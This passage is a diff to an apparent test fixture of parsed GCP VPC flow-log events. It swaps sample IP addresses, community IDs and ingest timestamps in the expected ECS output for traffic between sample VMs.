"2021-12-09T13:37:46.391978400Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw97\",\"jsonPayload\":{\"bytes_sent\":\"139359\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"70\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510575555Z", "end": "2019-06-14T03:49:37.933323342Z", @@ -14472,17 +14472,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60640, "bytes": 1461, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:NICAaeH22xLf7LP6W0kbWVQpWME=", + "community_id": "1:J26+Ln48KsAEVBqcU2DcbUsddkk=", "bytes": 1461, "transport": "tcp", "type": "ipv4", @@ -14496,7 +14496,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -14521,8 +14521,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868958800Z", - "original": "{\"insertId\":\"bxuq05fhgmw9i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":60640},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391982100Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw9i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60640},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:42:50.830164366Z", "end": "2019-06-14T03:42:50.942543211Z", @@ -14545,9 +14545,9 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 41818, - "ip": "198.51.100.182" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -14561,7 +14561,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+MSnEfQ6PdDGsHX0nTeNna2fZHI=", + "community_id": "1:iiFy+S+g1JJvu9kZvA1ivEiN2EM=", "bytes": 45, "transport": "tcp", "type": "ipv4", @@ -14576,7 +14576,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.182" + "67.43.156.14" ] }, "gcp": { 
@@ -14600,8 +14600,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868961700Z", - "original": "{\"insertId\":\"bxuq05fhgmw9c\",\"jsonPayload\":{\"bytes_sent\":\"45\",\"connection\":{\"dest_ip\":\"198.51.100.182\",\"dest_port\":41818,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:43:16.809366809Z\",\"packets_sent\":\"9\",\"reporter\":\"SRC\",\"rtt_msec\":\"1350\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391986700Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw9c\",\"jsonPayload\":{\"bytes_sent\":\"45\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":41818,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:43:16.809366809Z\",\"packets_sent\":\"9\",\"reporter\":\"SRC\",\"rtt_msec\":\"1350\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:11.031370298Z", "end": "2019-06-14T03:43:16.809366809Z", @@ -14622,9 +14622,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60640, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -14638,7 +14638,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:NICAaeH22xLf7LP6W0kbWVQpWME=", + "community_id": "1:J26+Ln48KsAEVBqcU2DcbUsddkk=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -14653,7 +14653,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -14677,8 +14677,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868964700Z", - "original": "{\"insertId\":\"bxuq05fhgmw9h\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":60640,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391990500Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw9h\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60640,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:42:50.830164366Z", "end": "2019-06-14T03:42:50.942543211Z", @@ -14705,18 +14705,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 358920, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 61 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:xlcXy61NrJvVRyzBr1bsyzEWEv8=", + "community_id": "1:uTd+omrfPom0tjhwVM+taqHcEco=", "bytes": 358920, "name": "default", "transport": "tcp", @@ -14738,7 +14738,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -14772,8 +14772,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868967700Z", - "original": "{\"insertId\":\"bxuq05fhgmw92\",\"jsonPayload\":{\"bytes_sent\":\"358920\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"61\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391995300Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw92\",\"jsonPayload\":{\"bytes_sent\":\"358920\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"61\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510534141Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -14800,18 +14800,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53104, "bytes": 653827, "domain": "zeek-nsm", - "ip": "198.51.100.88", + "ip": "67.43.156.14", "packets": 286 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:EvU+L/cBE9vacReP+K7ey2MZ6Bs=", + "community_id": "1:TMH6IVeF6TnVWOY7cFvGCaCMaPY=", "bytes": 653827, "name": "default", "transport": "tcp", @@ -14833,7 +14833,7 @@ }, "related": { "ip": [ - "198.51.100.88", + "67.43.156.14", "10.139.99.242" ] }, 
@@ -14870,8 +14870,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868970600Z", - "original": "{\"insertId\":\"bxuq05fhgmw8u\",\"jsonPayload\":{\"bytes_sent\":\"653827\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"198.51.100.88\",\"src_port\":53104},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"286\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391999800Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw8u\",\"jsonPayload\":{\"bytes_sent\":\"653827\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53104},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"286\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.188944581Z", "end": "2019-06-14T03:49:45.312543839Z", @@ -14892,10 +14892,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -14909,7 +14909,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:xlcXy61NrJvVRyzBr1bsyzEWEv8=", + "community_id": "1:uTd+omrfPom0tjhwVM+taqHcEco=", "bytes": 5220, "name": "default", "transport": "tcp", @@ -14932,7 +14932,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -14965,8 +14965,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868973300Z", - "original": "{\"insertId\":\"bxuq05fhgmw9g\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.392004Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw9g\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510534141Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -14993,18 +14993,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 31140, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 40 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:m8TzhysIkslBtL9JjV+tquk6V/g=", + "community_id": "1:KTuz6NE5trahWJ94CUsvoASfpt8=", "bytes": 31140, "name": "default", "transport": "tcp", @@ -15026,7 +15026,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -15060,8 +15060,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868976900Z", - "original": "{\"insertId\":\"bxuq05fhgmw91\",\"jsonPayload\":{\"bytes_sent\":\"31140\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"40\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.392008100Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw91\",\"jsonPayload\":{\"bytes_sent\":\"31140\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"40\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.789945697Z", "end": "2019-06-14T03:49:56.461240929Z", @@ -15088,18 +15088,18 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60126, "bytes": 1610630, "domain": "suricata-iowa", - "ip": "192.0.2.177", + "ip": "192.168.2.177", "packets": 509 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:p5hGVmQSWVn7uQmogt/lZdp5AHE=", + "community_id": "1:sulbuX1U/FB5g/v7obH/rY0tcHw=", "bytes": 1610630, "name": "default", "transport": "tcp", @@ -15121,7 +15121,7 @@ }, "related": { "ip": [ - "192.0.2.177", + "192.168.2.177", "10.139.99.242" ] }, 
@@ -15158,8 +15158,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868982300Z", - "original": "{\"insertId\":\"bxuq05fhgmw95\",\"jsonPayload\":{\"bytes_sent\":\"1610630\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.177\",\"src_port\":60126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"509\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.392011400Z", + "original": 
